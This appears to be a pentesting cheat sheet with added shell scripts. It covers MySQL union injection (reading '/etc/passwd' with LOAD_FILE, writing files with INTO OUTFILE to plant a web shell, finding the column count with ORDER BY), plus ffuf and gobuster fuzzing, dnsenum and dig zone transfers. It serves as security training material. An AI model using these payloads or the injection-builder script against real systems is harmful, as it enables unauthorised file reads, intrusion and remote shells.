After enumerating user privileges, if the current user has FILE you can use LOAD_FILE() to read files from the target.
UNION SELECT LOAD_FILE('/etc/passwd')
LOAD_FILE() returns NULL rather than an error when the file does not exist, is not readable by the mysqld OS user, is larger than max_allowed_packet, or lies outside secure_file_priv, so an empty column does not prove the path is absent. The injected SELECT must also have as many columns as the original query.
Pro tip: for tools that have no --proxy flag, run them through proxychains to route their traffic via Burp.
Writing files with INTO OUTFILE should not be possible on any modern, securely configured system, but if the user has FILE and secure_file_priv allows it you can drop a web shell into the web root and get a remote shell.
secure_file_priv
can have the following values:
NULL: cannot read or write files anywhere on the system (LOAD_FILE() and INTO OUTFILE are both disabled)
"" (empty string): can write anywhere the mysqld OS user has write access
"/path/to/dir": can write only to the specified directory (current MySQL packages ship with this restricted default, often /var/lib/mysql-files/)
SHOW VARIABLES LIKE 'secure_file_priv';
You can get this by querying information_schema using a union injection (filter on VARIABLE_NAME so you do not dump every variable). This works on MySQL 5.7 and MariaDB; MySQL 8.0 removed INFORMATION_SCHEMA.GLOBAL_VARIABLES and keeps the same data in performance_schema.global_variables.
UNION SELECT VARIABLE_NAME,VARIABLE_VALUE FROM INFORMATION_SCHEMA.GLOBAL_VARIABLES
SELECT "OOPS!" INTO OUTFILE "/var/www/html/poc.txt"
The file is created by the mysqld OS user, so the target directory must be writable by that user and permitted by secure_file_priv. INTO OUTFILE also refuses to overwrite an existing file, so pick a fresh name for each attempt.
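The three secure_file_priv cases above decide whether a given INTO OUTFILE target can ever succeed. The following added example (not part of the original notes) turns that decision into a shell function fed with the value as the mysql client prints it in batch mode, where NULL shows up as the literal word NULL. The mysql command in the comment and the sample values are assumptions for illustration; nothing here touches a database.

```sh
#!/bin/sh
# Added example, not from the original notes: decide from secure_file_priv
# whether "SELECT ... INTO OUTFILE <target>" can succeed.

# Pull the value out of the one-line, tab-separated output of
#   mysql -Bse "SHOW VARIABLES LIKE 'secure_file_priv'"
# which looks like "secure_file_priv<TAB>/var/lib/mysql-files/".
parse_secure_file_priv() {
    cut -f2
}

# $1: secure_file_priv value (NULL, "", or a directory), $2: absolute target path.
# Returns 0 if the write is allowed by secure_file_priv, 1 otherwise.
can_write_outfile() {
    priv="$1"; target="$2"
    case "$priv" in
        NULL)
            # import/export disabled entirely: no OUTFILE and no LOAD_FILE()
            return 1 ;;
        "")
            # unrestricted: any path the mysqld OS user can write to
            return 0 ;;
        *)
            # restricted to files directly inside that directory (no subdirectories)
            dir="${priv%/}/"
            case "$target" in
                "$dir"*)
                    rest="${target#"$dir"}"
                    case "$rest" in
                        "" | */*) return 1 ;;
                        *)        return 0 ;;
                    esac ;;
                *) return 1 ;;
            esac ;;
    esac
}

# Demo over the three cases against the web-root path from the notes.
if [ "${1:-}" = "demo" ]; then
    for v in "NULL" "" "/var/lib/mysql-files/"; do
        if can_write_outfile "$v" /var/www/html/poc.txt; then r=yes; else r=no; fi
        printf 'secure_file_priv=%-24s write /var/www/html/poc.txt: %s\n' "'$v'" "$r"
    done
fi
```

Run it as `sh secure_file_priv.sh demo`; the directory case is the one that matters in practice, because a restricted directory is almost never under the web root, so a web shell is only possible when the value is empty.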
A union injection appends extra rows to the result set using the UNION clause. For the UNION to be accepted, the injected SELECT must return the same number of columns as the original query, so the first step is to find that number.
There are two easy strategies for this: order by and union. Assume that the following query is vulnerable:
SELECT * from users where username='$oops'
order by
In MySQL you can give order by a numeric argument, which refers to a result column by position, so you can use it to infer the number of columns. Let $oops = "test' order by 1 -- " and the query becomes:
SELECT * from users where username='test' order by 1 -- '
Increase the number until MySQL answers "Unknown column 'N' in 'order clause'"; the last value that works is the column count. MySQL's -- comment needs a trailing space (or use # instead), and browsers and tools often strip it, so "-- -" is the safer spelling. The union strategy is the same idea from the other side: add NULL placeholders to UNION SELECT one at a time until the query stops failing.
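The order by walk above and the LOAD_FILE() read at the top of the page are two halves of one procedure: find the width, then build a UNION of that width with the file read in one column. The added example below (not from the original notes) does both in shell. The oracle is passed in as a function name so the script runs offline; the fake_oracle here is a constructed stand-in for a 3-column users table, and against a real target it would send the payload in the vulnerable parameter and return 1 when the "Unknown column" error appears.

```sh
#!/bin/sh
# Added example, not from the original notes: infer the width of the injected
# SELECT with ORDER BY n, then build a UNION SELECT of that width carrying
# LOAD_FILE() in one column and NULL elsewhere.

# Probe for column count n. "-- -" is used because MySQL's "-- " comment needs
# a trailing space that browsers and proxies often strip.
orderby_payload() {
    printf "test' ORDER BY %d -- -" "$1"
}

# Try n = 1..max until the oracle reports an error; the last good n is the width.
# $1: oracle function name, $2: upper bound (default 20). Returns 1 if no error
# was seen within the bound (wider result set, or the oracle is not working).
find_column_count() {
    oracle="$1"; max="${2:-20}"; n=1
    while [ "$n" -le "$max" ]; do
        if ! "$oracle" "$(orderby_payload "$n")"; then
            echo $((n - 1))
            return 0
        fi
        n=$((n + 1))
    done
    return 1
}

# Build "test' UNION SELECT NULL,...,<expr>,...,NULL -- -" with $2 placed in
# column $3 (1-based) of a $1-column select.
union_payload() {
    cols="$1"; expr="$2"; slot="$3"; i=1; sel=""
    while [ "$i" -le "$cols" ]; do
        if [ "$i" -eq "$slot" ]; then col="$expr"; else col="NULL"; fi
        sel="${sel}${sel:+,}${col}"
        i=$((i + 1))
    done
    printf "test' UNION SELECT %s -- -" "$sel"
}

# Constructed oracle standing in for the target: a 3-column users table, so
# ORDER BY 4 and above is treated as the "Unknown column" error.
fake_oracle() {
    probe_n=$(printf '%s' "$1" | sed -n 's/.*ORDER BY \([0-9]*\).*/\1/p')
    [ "$probe_n" -le 3 ]
}

if [ "${1:-}" = "demo" ]; then
    cols=$(find_column_count fake_oracle) || { echo "no ORDER BY error within bound" >&2; exit 1; }
    echo "columns: $cols"
    union_payload "$cols" "LOAD_FILE('/etc/passwd')" 2
    echo
fi
```

The column you put LOAD_FILE() in must be one the page actually renders and must accept a string; if the first attempt shows nothing, move the expression to another slot before assuming the read failed.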
Here are some resources containing XSS payloads:
Encoding and decoding from the shell. echo appends a newline, which is why the base64 output is dGVzdAo= rather than dGVzdA== and the hex ends in 0a; use printf '%s' 'test' instead when the payload must not carry that trailing byte.
base64 encode / decode:
echo 'test' | base64
echo 'dGVzdAo=' | base64 -d
hex encode / decode:
echo 'test' | xxd -p
echo '746573740a' | xxd -p -r
ROT13 (the same command encodes and decodes):
echo 'test' | tr 'A-Za-z' 'N-ZA-Mn-za-m'
echo 'grfg' | tr 'A-Za-z' 'N-ZA-Mn-za-m'
eval(function(p,a,c,k,e,r) is the signature of JavaScript obfuscated with Dean Edwards' packer; unpack it before analysing the script.
ffuf commands
In each case, FUZZ is the placeholder for word replacement.
ffuf \
-w /usr/share/seclists/Discovery/Web-Content/common.txt \
-u http://example.com/target_dir/FUZZ \
-e .txt,.html,.bak   # add further extensions as needed
ffuf \
-w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt \
-u http://example.com/target_dir/FUZZ \
-recursion
POST parameter
Put FUZZ in the value to fuzz a known parameter, or in the parameter name to hunt for hidden ones. -ic skips comment lines in the wordlist.
ffuf \
-w /usr/share/seclists/Discovery/Web-Content/common.txt \
-u http://example.com/example.php \
-X POST \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "y=FUZZ" \
-ic
GET parameter
The URL is quoted so the shell does not try to glob the ? in it.
ffuf \
-w /usr/share/seclists/Discovery/Web-Content/common.txt \
-u 'http://example.com/example.php?x=FUZZ' \
-ic
dnsenum
Performs various DNS-level and OSINT searches to find subdomains. --enum is a shortcut for the default thread count, Google scraping and WHOIS lookups; -f gives the wordlist for subdomain brute forcing.
dnsenum \
--enum target.tld \
-f /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
gobuster
You can brute force virtual-host subdomains with gobuster. --append-domain sends each wordlist entry as word.<domain> in the Host header, with the domain taken from -u, so give the hostname there rather than a bare IP when you use it.
gobuster vhost \
-u http[s]://target[:port] \
-w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt \
--append-domain
You can do a DNS zone transfer using dig by using axfr. The server you ask must be one of the zone's authoritative name servers (dig ns target.tld lists them); try each one, since they are often configured independently.
dig axfr @dns-server.com target.tld
This will return all DNS records for target.tld. A transfer is intended to copy all records from a primary to a secondary server and should only be permitted for trusted hosts, but misconfigured servers allow unauthorised transfers, giving full enumeration without brute forcing. A correctly configured server answers "; Transfer failed.".
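Once a transfer succeeds the useful part is the host list, and a refused transfer has to be told apart from a zone with no interesting records. The added example below (not from the original notes) does that over dig axfr output read from stdin; the two zone dumps embedded in it are constructed, and ns1.target.tld is an assumed name server.

```sh
#!/bin/sh
# Added example, not from the original notes: turn a "dig axfr" dump into a
# host list and distinguish a refused transfer from an empty zone.
# A real dump would come from:  dig axfr @ns1.target.tld target.tld

# Print unique owner names of A, AAAA and CNAME records from dig axfr output
# on stdin, trailing dot removed. Returns 1 if the server refused the transfer.
axfr_hosts() {
    dump=$(cat)
    if printf '%s\n' "$dump" | grep -q '^; Transfer failed'; then
        return 1
    fi
    # dig prints: owner TTL class type rdata; comment lines start with ";"
    printf '%s\n' "$dump" |
        awk '$1 !~ /^;/ && NF >= 5 && ($4 == "A" || $4 == "AAAA" || $4 == "CNAME") {
                 sub(/\.$/, "", $1); print $1
             }' |
        sort -u
}

# Constructed dig axfr output for a zone that allows transfers.
SAMPLE_AXFR='; <<>> DiG 9.18.1 <<>> axfr @ns1.target.tld target.tld
;; global options: +cmd
target.tld.             3600    IN      SOA     ns1.target.tld. hostmaster.target.tld. 2024010101 3600 900 604800 86400
target.tld.             3600    IN      NS      ns1.target.tld.
www.target.tld.         3600    IN      A       192.0.2.10
dev.target.tld.         3600    IN      A       192.0.2.11
mail.target.tld.        3600    IN      A       192.0.2.20
intranet.target.tld.    3600    IN      CNAME   www.target.tld.
target.tld.             3600    IN      SOA     ns1.target.tld. hostmaster.target.tld. 2024010101 3600 900 604800 86400
;; Query time: 4 msec
;; XFR size: 7 records (messages 1, bytes 262)'

# Constructed output from a correctly configured server.
SAMPLE_REFUSED='; <<>> DiG 9.18.1 <<>> axfr @ns1.target.tld target.tld
;; global options: +cmd
; Transfer failed.'

if [ "${1:-}" = "demo" ]; then
    printf '%s\n' "$SAMPLE_AXFR" | axfr_hosts
    printf '%s\n' "$SAMPLE_REFUSED" | axfr_hosts || echo "transfer refused"
fi
```

Against a live server replace the sample with `dig axfr @ns1.target.tld target.tld | axfr_hosts`; the resulting list is a ready-made input for the vhost brute forcing above, and the CNAME targets are worth reading separately because they often point at hosting providers or internal names.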